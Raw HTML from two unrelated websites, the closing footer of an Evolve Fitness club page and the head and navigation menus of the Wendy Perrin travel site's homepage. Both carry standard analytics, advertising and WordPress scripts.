href="https://evolvefitnessinc.com/group-exercise-classes/zumba/">Zumba</a></li> <li id="menu-item-5877" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5877 menu-item-cycle-studio"><a href="https://evolvefitnessinc.com/group-exercise-classes/cycle-studio/">Cycle Studio</a></li> </ul> </li> <li id="menu-item-4675" class="last menu-item-type-post_type menu-item-object-page menu-item-4675 menu-item-personal-training"><a href="https://evolvefitnessinc.com/personal-training/">Personal Training</a></li> </ul> <div id="footBtm"> <div id="social"> <p style="text-align:left;margin-bottom:0;"><small>Cambridge</small></p> <a href="https://twitter.com/evolvefit" target="_blank" id="twitter"><span>Twitter</span></a> <a href="https://www.instagram.com/EvolveFitnessCambridge/" target="_blank" id="instagram"><span>Instagram</span></a> <a href="https://www.facebook.com/evolvefitness" target="_blank" id="facebook"><span>Facebook</span></a> <!--<a href="#" target="_blank" id="share"></a>--> </div> &nbsp;&nbsp; <div id="social"> <p style="text-align:left;margin-bottom:0;"><small>Framingham</small></p> <a href="https://twitter.com/evolvefit" target="_blank" id="twitter"><span>Twitter</span></a> <a href="https://www.instagram.com/Evolvefitness_framingham/" target="_blank" id="instagram"><span>Instagram</span></a> <a href="https://www.facebook.com/EvolveFitnessFramingham" target="_blank" id="facebook"><span>Facebook</span></a> <!--<a href="#" target="_blank" id="share"></a>--> </div> <ul class="footerNavBtm"> <li id="menu-item-428" class="first menu-item-type-custom menu-item-object-custom menu-item-428 menu-item-media-2"><a href="#media">Media</a></li> <li id="menu-item-429" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-429 menu-item-health-fitness-tips"><a href="https://evolvefitnessinc.com/health-fitness-tips/">Blog</a></li> <li id="menu-item-448" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-448 menu-item-mobile-2"><a href="#mobile-app">Mobile</a></li> <li id="menu-item-430" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-430 menu-item-sign-in-register"><a href="https://evolvefitnessinc.com/sign-in-register/">Login</a></li> <li id="menu-item-439" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-439 menu-item-jobs"><a href="https://evolvefitnessinc.com/jobs/">Jobs</a></li> <li id="menu-item-440" class="last menu-item-type-post_type menu-item-object-page menu-item-440 menu-item-policy"><a href="https://evolvefitnessinc.com/policy/">Policy</a></li> </ul> </div> </footer> <div id="offerOverlay" class="overlayBg"> <div class="overlay"> <div class="controls">X</div> <div class="tabs"><div class="tab active">Cambridge</div><div class="tab ">Framingham</div></div><div class="offerContent"><div class="offer active" id="Cambridge"><p><a href="/free-fitness-pass/"><img src="/wp/wp-content/uploads/2017/05/cam-3-day-pass-min.png" alt="3-Day Pass" width="350" height="500" class="alignnone size-full wp-image-1238" /></a></p> </div><div class="offer " id="Framingham"></div></div> </div> </div> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://evolvefitnessinc.com/wp/wp-admin/admin-ajax.php"; </script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":"","font_method":"svg"}; /* ]]> */ </script> <script type='text/javascript' src='https://use.fontawesome.com/ca0746e195.js?ver=4.7.13'></script> <img src="https://ib.adnxs.com/seg?add=4199795" width="1" height="1" alt="ADNXS" /> <script type="text/javascript"> adroll_adv_id = "BXDHD3ULFNG4NNXR7N52N7"; adroll_pix_id = "UKXOJNIGOVAGVGQUE7P56K"; /* OPTIONAL: provide email to improve user identification */ /* adroll_email = "[email protected]"; */ (function () { var _onload = function(){ if (document.readyState && !/loaded|complete/.test(document.readyState)){setTimeout(_onload, 10);return} if (!window.__adroll_loaded){__adroll_loaded=true;setTimeout(_onload, 50);return} var scr = document.createElement("script"); var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com"); scr.setAttribute('async', 'true'); scr.type = "text/javascript"; scr.src = host + "/j/roundtrip.js"; ((document.getElementsByTagName('head') || [null])[0] || document.getElementsByTagName('script')[0].parentNode).appendChild(scr); }; if (window.addEventListener) {window.addEventListener('load', _onload, false);} else {window.attachEvent('onload', _onload)} }()); </script> <!-- Google Code for Remarketing Tag --> <!-------------------------------------------------- Remarketing tags may not be associated with personally identifiable information or placed on pages related to sensitive categories. See more information and instructions on how to setup the tag on: https://google.com/ads/remarketingsetup ---------------------------------------------------> <script type="text/javascript"> /* <![CDATA[ */ var google_conversion_id = 864227110; var google_custom_params = window.google_tag_params; var google_remarketing_only = true; /* ]]> */ </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script> <noscript> <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="Ad" src="https://googleads.g.doubleclick.net/pagead/viewthroughconversion/864227110/?guid=ON&amp;script=0"/> </div> </noscript> <script type="text/javascript" defer src="https://evolvefitnessinc.com/wp/wp-content/cache/autoptimize/js/autoptimize_b20d320ab2dd7b0d6920f99a6fa37efc.js"></script></body> </html> <!-- Dynamic page generated in 0.662 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-08 18:04:59 --> <!-- Compression = gzip -->
0
<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--><head> <meta charset="UTF-8" /><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var u="nr@context",f=e("gos"),c=e(3),s={},p={},d=n.exports=o();d.backlog=s},{}],gos:[function(e,n,t){function r(e,n,t){if(o.call(e,n))return e[n];var r=t();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(e,n,{value:r,writable:!0,enumerable:!1}),r}catch(i){}return e[n]=r,r}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],handle:[function(e,n,t){function r(e,n,t,r){o.buffer([e],r),o.emit(e,n,t)}var o=e("ee").get("handle");n.exports=r,r.ee=o},{}],id:[function(e,n,t){function r(e){var n=typeof e;return!e||"object"!==n&&"function"!==n?-1:e===window?0:a(e,i,function(){return o++})}var o=1,i="nr@id",a=e("gos");n.exports=r},{}],loader:[function(e,n,t){function r(){if(!E++){var e=x.info=NREUM.info,n=l.getElementsByTagName("script")[0];if(setTimeout(s.abort,3e4),!(e&&e.licenseKey&&e.applicationID&&n))return s.abort();c(y,function(n,t){e[n]||(e[n]=t)}),f("mark",["onload",a()+x.offset],null,"api");var t=l.createElement("script");t.src="https://"+e.agent,n.parentNode.insertBefore(t,n)}}function o(){"complete"===l.readyState&&i()}function i(){f("mark",["domContent",a()+x.offset],null,"api")}function a(){return O.exists&&performance.now?Math.round(performance.now()):(u=Math.max((new Date).getTime(),u))-x.offset}var u=(new Date).getTime(),f=e("handle"),c=e(3),s=e("ee"),p=e(2),d=window,l=d.document,m="addEventListener",v="attachEvent",g=d.XMLHttpRequest,w=g&&g.prototype;NREUM.o={ST:setTimeout,SI:d.setImmediate,CT:clearTimeout,XHR:g,REQ:d.Request,EV:d.Event,PR:d.Promise,MO:d.MutationObserver};var h=""+location,y={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1123.min.js"},b=g&&w&&w[m]&&!/CriOS/.test(navigator.userAgent),x=n.exports={offset:u,now:a,origin:h,features:{},xhrWrappable:b,userAgent:p};e(1),l[m]?(l[m]("DOMContentLoaded",i,!1),d[m]("load",r,!1)):(l[v]("onreadystatechange",o),d[v]("onload",r)),f("mark",["firstbyte",u],null,"api");var E=0,O=e(5)},{}]},{},["loader"]);</script> <meta name="viewport" content="width=device-width" /> <title>Wendy Perrin - Make Your Next Trip Extraordinary</title> <!-- <link rel="stylesheet" href="https://wendyperrin.com/js/phone/build/css/intlTelInput.css"> --> <!-- <link rel="stylesheet" href="https://wendyperrin.com/js/phone/build/css/demo.css"> --> <link rel="stylesheet" type="text/css" href="//www.wendyperrin.com/wp-content/cache/wpfc-minified/fhq3i1kp/9tqlm.css" media="all"/> <meta name="google-site-verification" content="XLRl3y27uv3sBwbEZFNwbg4GTP4YypCGc6aSwuhJVD0" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <link rel="pingback" href="https://www.wendyperrin.com/xmlrpc.php" /> <!--[if lt IE 9]> <script src="https://www.wendyperrin.com/wp-content/themes/twentytwelve/js/html5.js" type="text/javascript"></script> <![endif]--> <meta property="og:image" content="https://www.wendyperrin.com/wp-content/uploads/2014/09/fb-wp-logo.png"/> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-54760781-1', 'auto'); ga('send', 'pageview'); </script> <link href='https://fonts.googleapis.com/css?family=Lato:300,400,700,900' rel='stylesheet' type='text/css'> <link href='https://fonts.googleapis.com/css?family=Playfair+Display:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <!-- This site is optimized with the Yoast SEO plugin v9.4 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Everything you need to make your next trip extraordinary: access, answers, and Insider&#039;s Guides to the world’s best destinations."/> <link rel="canonical" href="https://www.wendyperrin.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Wendy Perrin - Make Your Next Trip Extraordinary" /> <meta property="og:description" content="Everything you need to make your next trip extraordinary: access, answers, and Insider&#039;s Guides to the world’s best destinations." /> <meta property="og:url" content="https://www.wendyperrin.com/" /> <meta property="og:site_name" content="Wendy Perrin" /> <meta property="og:image" content="https://www.wendyperrin.com/dev/wp-content/uploads/2014/08/logo1.jpg" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.wendyperrin.com/#website","url":"https://www.wendyperrin.com/","name":"Wendy Perrin","potentialAction":{"@type":"SearchAction","target":"https://www.wendyperrin.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//a.optmnstr.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /> <link rel="alternate" type="application/rss+xml" title="Wendy Perrin &raquo; Feed" href="https://www.wendyperrin.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Wendy Perrin &raquo; Comments Feed" href="https://www.wendyperrin.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Wendy Perrin &raquo; Home Comments Feed" href="https://www.wendyperrin.com/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.wendyperrin.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=b7b191650e9eeec4094d0ce432d3cc45"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <!-- <link rel='stylesheet' id='mobile.nav.frontend.css-css' href='https://www.wendyperrin.com/wp-content/plugins/SD-mobile-nav/css/mobile.nav.frontend.css?ver=b7b191650e9eeec4094d0ce432d3cc45' type='text/css' media='all' /> --> <!-- <link rel='stylesheet' id='commentvalidation-css' href='https://www.wendyperrin.com/wp-content/plugins/comment-validation/comment-validation.css?ver=b7b191650e9eeec4094d0ce432d3cc45' type='text/css' media='all' /> --> <!-- <link rel='stylesheet' id='social_share_button_style-css' href='https://www.wendyperrin.com/wp-content/plugins/social-share-button/assets/front/css/style.css?ver=b7b191650e9eeec4094d0ce432d3cc45' type='text/css' media='all' /> --> <!-- <link rel='stylesheet' id='font-awesome-css' href='https://www.wendyperrin.com/wp-content/plugins/social-share-button/assets/global/css/font-awesome.css?ver=b7b191650e9eeec4094d0ce432d3cc45' type='text/css' media='all' /> --> <!-- <link rel='stylesheet' id='sliderpro-plugin-style-css' href='https://www.wendyperrin.com/wp-content/plugins/sliderpro/public/assets/css/slider-pro.min.css?ver=4.5.0' type='text/css' media='all' /> --> <link rel="stylesheet" type="text/css" href="//www.wendyperrin.com/wp-content/cache/wpfc-minified/q6nupli3/9tqlm.css" media="all"/> <link rel='stylesheet' id='twentytwelve-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400italic,700italic,400,700&#038;subset=latin,latin-ext' type='text/css' media='all' /> <!-- <link rel='stylesheet' id='twentytwelve-style-css' href='https://www.wendyperrin.com/wp-content/themes/wendy-perrin-child/style.css?ver=1539869996' type='text/css' media='all' /> --> <link rel="stylesheet" type="text/css" href="//www.wendyperrin.com/wp-content/cache/wpfc-minified/jy5lstqa/9tqlm.css" media="all"/> <!--[if lt IE 9]> <link rel='stylesheet' id='twentytwelve-ie-css' href='https://www.wendyperrin.com/wp-content/themes/twentytwelve/css/ie.css?ver=20121010' type='text/css' media='all' /> <![endif]--> <script>var jquery_placeholder_url = 'https://www.wendyperrin.com/wp-content/plugins/gravity-forms-placeholders/jquery.placeholder-1.0.1.js';</script><script type='text/javascript' src='//ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js'></script> <script>window.jQuery || document.write('<script src="https://www.wendyperrin.com/wp-includes/js/jquery/jquery.js"><\/script>')</script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/jquery-migrate/1.4.1/jquery-migrate.min.js'></script> <script>window.jQuery.migrateMute || document.write('<script src="https://www.wendyperrin.com/wp-includes/js/jquery/jquery-migrate.min.js"><\/script>')</script> <script src='//www.wendyperrin.com/wp-content/cache/wpfc-minified/g3czpik/9tqlm.js' type="text/javascript"></script> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/SD-mobile-nav/js/jquery.transit.min.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> --> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/SD-mobile-nav/js/jquery.touchwipe.min.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> --> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/SD-mobile-nav/js/jquery.sidr.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> --> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/SD-mobile-nav/js/mobile.nav.frontend.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> --> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/comment-validation/jquery.validate.pack.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> --> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/comment-validation/comment-validation.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> --> <script type='text/javascript'> /* <![CDATA[ */ var social_share_button_ajax = {"social_share_button_ajaxurl":"https:\/\/www.wendyperrin.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script src='//www.wendyperrin.com/wp-content/cache/wpfc-minified/2qux810k/9tqlm.js' type="text/javascript"></script> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/social-share-button/assets/front/js/scripts.js?ver=b7b191650e9eeec4094d0ce432d3cc45'></script> --> <script type='text/javascript' data-cfasync="false" id="omapi-script" async="async" src='https://a.optmnstr.com/app/js/api.min.js'></script> <script src='//www.wendyperrin.com/wp-content/cache/wpfc-minified/e5bh6aiw/9tqlm.js' type="text/javascript"></script> <!-- <script type='text/javascript' src='https://www.wendyperrin.com/wp-content/plugins/gravity-forms-placeholders/gf.placeholders.js?ver=1.0'></script> --> <link rel='https://api.w.org/' href='https://www.wendyperrin.com/wp-json/' /> <link rel='shortlink' href='https://www.wendyperrin.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.wendyperrin.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.wendyperrin.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.wendyperrin.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.wendyperrin.com%2F&#038;format=xml" /> <style id="sdrn_css" type="text/css" > /* apply appearance settings */ #sdrn_bar { background: #0D0D0D; } #sdrn_bar .menu_title, #sdrn_bar .sdrn_icon_menu { color: #F2F2F2; } #sdrn_menu { background: #2E2E2E!important; } #sdrn_menu.sdrn_levels ul li { border-bottom:1px solid #131212; border-top:1px solid #474747; } #sdrn_menu ul li a { color: #CFCFCF; } #sdrn_menu ul li a:hover { color: #606060; } #sdrn_menu.sdrn_levels a.sdrn_parent_item { border-left:1px solid #474747; } #sdrn_menu .sdrn_icon_par { color: #CFCFCF; } #sdrn_menu .sdrn_icon_par:hover { color: #606060; } #sdrn_menu.sdrn_levels ul li ul { border-top:1px solid #131212; } #sdrn_menu, #sdrn_menu ul, #sdrn_menu li { border-bottom:none!important; } #sdrn_menu.sdrn_levels > ul { border-bottom:1px solid #474747!important; } .sdrn_no_border_bottom { border-bottom:none!important; } #sdrn_menu.sdrn_levels ul li ul { border-top:none!important; } #sdrn_menu.left { width:80%; left: -80%; right: auto; } #sdrn_menu.right { width:80%; right: -80%; left: auto; } #sdrn_bar .sdrn_ic { float: right!important; margin-right:0px!important; } #sdrn_bar .bar_logo { pading-left: 0px; } /* show the bar and hide othere navigation elements */ @media only screen and (max-width: 768px) { html { padding-top: 42px!important; } #sdrn_bar { display: block!important; } #above-nav, .menu-primary-navigation-container { display:none!important; } } /* hide the bar & the menu */ @media only screen and (min-width: 769px) { } </style> <meta property="og:title" content="Home" /><meta property="og:url" content="https://www.wendyperrin.com/" /><meta property="og:image" content="https://www.wendyperrin.com/wp-content/uploads/2014/09/fb-wp-logo.png" /> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <link rel="icon" href="https://www.wendyperrin.com/wp-content/uploads/2018/05/cropped-wp-logo-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.wendyperrin.com/wp-content/uploads/2018/05/cropped-wp-logo-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.wendyperrin.com/wp-content/uploads/2018/05/cropped-wp-logo-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.wendyperrin.com/wp-content/uploads/2018/05/cropped-wp-logo-270x270.png" /> </head> <body data-rsssl=1 class="home page-template page-template-page-templates page-template-page-home page-template-page-templatespage-home-php page page-id-5 custom-font-enabled"> <div id="site-wrap"> <div id="header-wrap"> <div id="above-nav" class="group"> <div id="wp-logo-box"> <a href="https://www.wendyperrin.com/"> <img src="https://www.wendyperrin.com/wp-content/themes/wendy-perrin-child/img/logo.png" /> </a> </div><!-- #wp-logo-box --> <div id="travel-truth-tag"> <h2>Make Your Next Trip Extraordinary</h2> </div><!-- #travel-truth-tag --> <div id="header-social-icons"> <!--<div id="connect-label"><a href="https://www.wendyperrin.com/contact">Contact</a></div>--> <div id="fb-icon-foot" class="icon-head"><a target="_blank" href="https://www.facebook.com/WendyPerrinTravel"><span></span></a></div><!-- #fb-icon-foot --> <div id="tw-icon-foot" class="icon-head"><a target="_blank" href="https://twitter.com/wendyperrin"><span></span></a></div><!-- #tw-icon-foot --> <div id="ig-icon-foot" class="icon-head"><a target="_blank" href="http://instagram.com/wendyperrin"><span></span></a></div><!-- #ig-icon-foot --> <div id="pn-icon-foot" class="icon-head"><a target="_blank" href="http://www.pinterest.com/wperrin/"><span></span></a></div><!-- #pn-icon-foot --> <div id="gp-icon-foot" class="icon-head"><a target="_blank" href="https://plus.google.com/+WendyPerrin/"><span></span></a></div><!-- #gp-icon-foot --> </div><!-- #header-social-icons --> <div id="header-search"> <form role="search" method="get" id="searchform" action="https://www.wendyperrin.com/"> <div id="search-box"><input type="text" value="" placeholder="Search" name="s" id="s"></div> <div id="enter-box"><input type="submit" id="searchsubmit" value=""></div> </form> </div><!-- #header-search --> </div><!-- #above-nav --> <div id="navigation-wrap" class="group"> <div id="destination-search-wrap"> <div id="destination-search-label"> <div class="menu-destination-navigation-container"><ul id="menu-destination-navigation" class="destination-menu"><li id="menu-item-2682" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-2682"><a href="https://www.wendyperrin.com/destinations/">Destinations</a> <ul class="sub-menu"> <li id="menu-item-1913" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1913"><a href="https://www.wendyperrin.com/destinations/north-america/">North America</a></li> <li id="menu-item-1906" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1906"><a href="https://www.wendyperrin.com/destinations/europe/">Europe</a></li> <li id="menu-item-1910" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1910"><a href="https://www.wendyperrin.com/destinations/caribbean/">Caribbean</a></li> <li id="menu-item-1909" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1909"><a href="https://www.wendyperrin.com/destinations/africa-middle-east/">Africa &#038; Middle East</a></li> <li id="menu-item-1911" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1911"><a href="https://www.wendyperrin.com/destinations/central-america/">Central America</a></li> <li id="menu-item-1884" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1884"><a href="https://www.wendyperrin.com/destinations/asia/">Asia</a></li> <li id="menu-item-1905" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1905"><a href="https://www.wendyperrin.com/destinations/south-america/">South America</a></li> <li id="menu-item-1908" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1908"><a href="https://www.wendyperrin.com/destinations/australia-pacific/">Australia &#038; Pacific</a></li> <li id="menu-item-10163" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10163"><a href="https://www.wendyperrin.com/destinations/villa-vacations-and-apartment-rentals/">Villa Vacations</a></li> <li id="menu-item-1907" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1907"><a href="https://www.wendyperrin.com/destinations/cruises/">Cruises</a></li> </ul> </li> </ul></div> <div id="destinations-search"> <form role="search" method="get" id="searchform" action="https://www.wendyperrin.com/"> <div id="search-box"><input type="text" value="" placeholder="I want to go to..." name="s" id="s"></div> <div id="enter-box"><input type="submit" id="searchsubmit" value=""></div> </form> </div><!-- #destinations-search --> </div><!-- #destination-search-label --> </div><!-- #destination-search-wrap --> <div class="menu-primary-navigation-container"><ul id="menu-primary-navigation" class="nav-menu black-bar-menu"><li id="menu-item-1657" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1657"><a href="https://www.wendyperrin.com/about/">About</a></li> <li id="menu-item-1658" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1658"><a href="https://www.wendyperrin.com/ask-wendy-question/">Ask Wendy</a></li> <li id="menu-item-1980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1980"><a href="https://www.wendyperrin.com/travel-tips/">Travel Tips</a> <ul class="sub-menu"> <li id="menu-item-1929" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1929"><a href="https://www.wendyperrin.com/travel-tips/family-travel/">Family Travel</a></li> <li id="menu-item-30078" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-30078"><a href="https://www.wendyperrin.com/category/travel-tips/avoid-crowds/">Avoiding Crowds</a></li> <li id="menu-item-1932" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1932"><a href="https://www.wendyperrin.com/travel-tips/airline-travel/">Airline Travel</a></li> <li id="menu-item-24434" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-24434"><a href="https://www.wendyperrin.com/ideal-best-island-for-each-month-year/">Islands</a></li> <li id="menu-item-1930" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1930"><a href="https://www.wendyperrin.com/travel-tips/cruises/">Cruises</a></li> <li id="menu-item-22746" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22746"><a href="https://www.wendyperrin.com/category/plan_a_trip/holiday-travel/">Holidays &#038; School Breaks</a></li> </ul> </li> <li id="menu-item-4685" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4685"><a href="https://www.wendyperrin.com/wow-list">The WOW List</a> <ul class="sub-menu"> <li id="menu-item-15233" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15233"><a href="https://www.wendyperrin.com/wow-list">Tested Experts</a></li> <li 